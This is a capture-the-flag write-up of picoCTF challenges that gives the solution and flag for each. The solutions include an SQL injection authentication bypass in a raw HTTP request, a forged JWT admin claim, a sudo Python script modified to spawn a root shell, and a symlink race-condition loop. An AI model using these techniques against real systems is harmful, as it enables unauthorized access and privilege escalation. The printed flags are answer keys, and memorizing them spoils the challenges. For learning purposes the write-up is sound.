Web - findme
View the request through Burp picoCTF{proxies_all_the_way_be716d8e}
Web - More SQL
Use burp for this one, otherwise you miss the flag. In the login request use `x’ OR 1=1 –’ to do an authentication bypass. The flag gets printed in the response.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST / HTTP/1.1
Host: XXX
User-Agent: XXX
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: XXX
Connection: close
Referer: XXX
Cookie: XXX
Upgrade-Insecure-Requests: 1
username=admin&password=x' or 1=1 --
picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_e3e46aae}
Web - Java Code Analysis
/books
1
{"type":"SUCCESS","payload":[{"id":3,"title":"Little Brother","desc":"Little Brother is a novel by Cory Doctorow, published by Tor Books. It was released on April 29, 2008. The novel is about four teenagers in San Francisco who, in the aftermath of a terrorist attack on the San Francisco–Oakland Bay Bridge and BART system, defend themselves against the Department of Homeland Security's attacks on the Bill of Rights.","role":"Free"},{"id":4,"title":"The Future of the Internet and How to Stop It","desc":"The Future of the Internet and How to Stop It is a book published in 2008 by Yale University Press and authored by Jonathan Zittrain. The book discusses several legal issues regarding the Internet.","role":"Premium"},{"id":5,"title":"Flag","desc":"You need to have Admin role to access this special book!","role":"Admin"}]}
SecretGenerator
1
2
3
4
private String generateRandomString(int len) {
// not so random
return "1234";
}
use jwt.io to decode the authorization
header in the request to get the secret pdf GET /base/books/pdf/5 HTTP/1.1
change role, userid and email to admin
1
2
3
4
5
6
7
8
{
"role": "Admin",
"iss": "bookshelf",
"exp": 1679686364,
"iat": 1679081564,
"userId": 2,
"email": "admin"
}
picoCTF{w34k_jwt_n0t_g00d_d7c2e335}
Forensics - hideme
You get an image called flag.png Running binwalk shows us that there is an image hidden in this flag.png binwalk -e flag.png extracts secret/flag.png
Flag: picoCTF{Hiddinng_An_imag3within@n_ima9e_85e04ab8}
Forensics - PcapPoisining
You get a pcap file In Wireshark, search by Packet Bytes, Regular expression, picoCTF{.*}
Forensics - Who is it
You get an .eml file, open the .eml file with a text editor. Find the IP address of the mail server this mail has been sent from: Received: from mail.onionmail.org (mail.onionmail.org. [173.249.33.206])
Search on whois.com for this IP.
1
2
3
4
5
6
7
8
person: Wilhelm Zwalina
address: Contabo GmbH
address: Aschauer Str. 32a
address: 81549 Muenchen
phone: +49 89 21268372
fax-no: +49 89 21665862
nic-hdl: MH7476-RIPE
mnt-by: MNT-CONTABO
picoCTF{WilhelmZwalina}
Forensics - FindandOpen
Analysing the pcap file, in the ethernet traffic we find a base64 encoded string ´VGhpcyBpcyB0aGUgc2VjcmV0OiBwaWNvQ1RGe1IzNERJTkdfTE9LZF8=´. This gives the password for the zip with the full flag.
picoCTF{R34DING_LOKd_fil56_succ3ss_cbf2ebf6}
General - Chrono
picoplayer@challenge:~$ cat /etc/crontab
picoCTF{Sch3DUL7NG_T45K3_L1NUX_d83baed1}
General - useless
picoplayer@challenge:~$ man useless
picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_7065}
Binary Exploitation - hijack
Python script in the home directory has root permissions, we use it to spawn a root shell and get the flag. sudo -l
1
2
3
4
5
6
Matching Defaults entries for picoctf on challenge:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User picoctf may run the following commands on challenge:
(ALL) /usr/bin/vi
(root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.py
Modify .server.py
script to spawn a shell os.system("/bin/sh")
Execute the python script as root: sudo -u root /usr/bin/python3 /home/picoctf/.server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
Spawning root shell...
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -lah
total 12K
drwx------ 1 root root 23 Mar 16 02:09 .
drwxr-xr-x 1 root root 51 Mar 27 05:46 ..
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 43 Mar 16 02:09 .flag.txt
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
# cat .flag.txt
picoCTF{pYth0nn_libraryH!j@CK!n9_0083cb0b}
Flag: picoCTF{pYth0nn_libraryH!j@CK!n9_0083cb0b}
General - Specialer
A restricted shell is spawn, after some trial and error we find out only echo
and some basic syntax is allowed.
We can for loop over the directories to get the listing of files and directories, as ls
isn’t allowed, with for entry in "directory_here"/*; do echo "$entry"; done
1
2
3
4
5
Specialer$ for entry in "/home/ctf-player/"/*; do echo "$entry"; done
/home/ctf-player//abra
/home/ctf-player//ala
/home/ctf-player//echo
/home/ctf-player//sim
There are a bunch of txt files in these directories, while going through them and reading the content via echo "$(<file_here.txt)"
. We find the flag:
1
2
Specialer$ echo "$(</home/ctf-player/ala/kazam.txt)"
return 0 picoCTF{y0u_d0n7_4ppr3c1473_wh47_w3r3_d01ng_h3r3_c42168d9}
Forensics - MSB
https://github.com/Pulho/sigBits/blob/master/sigBits.py
1
`python3 sigBits.py --type=Msb Ninja-and-Prince-Genji-Ukiyoe-Utagawa-Kunisada.flag.png`
Output
1
has done what was commanded himin going to present himself before my lady Dulcinea del Toboso, he willhave done all that he was bound to do, and does not deserve furtherpunishment unless he commits some new offence."picoCTF{15_y0ur_que57_qu1x071c_0r_h3r01c_06326238}"Thou hast said well and hit the point," answered Don Quixote; and so Irecall the oath in so far
Binary - Tic-Tac
This challenge is about race conditions. The cpp program only can read files if they are the owner of the user executing this program. Create an empty file that the user owns
touch myfile
Setup a look that will iterate between creating a symlink to the flag.txt and our owned file. We hit the sweet spot where:
- The
textreader
perfoms the user check, our symlinklink
is linked to our owned filemyfile
- Afterwards when the
textreader
reads the file, our symlinklink
is linked to the root owned fileflag.txt
We let this script run in the background (&
)
while true; do ln -sf flag.txt link; ln -sf myfile link; done &
Setup a look to constantly try to read our symlink link
1
2
3
4
5
6
7
8
9
10
11
12
ctf-player@pico-chall$ while true; do ./txtreader link; done
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
picoCTF{ToctoU_!s_3a5y_5748402c}
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file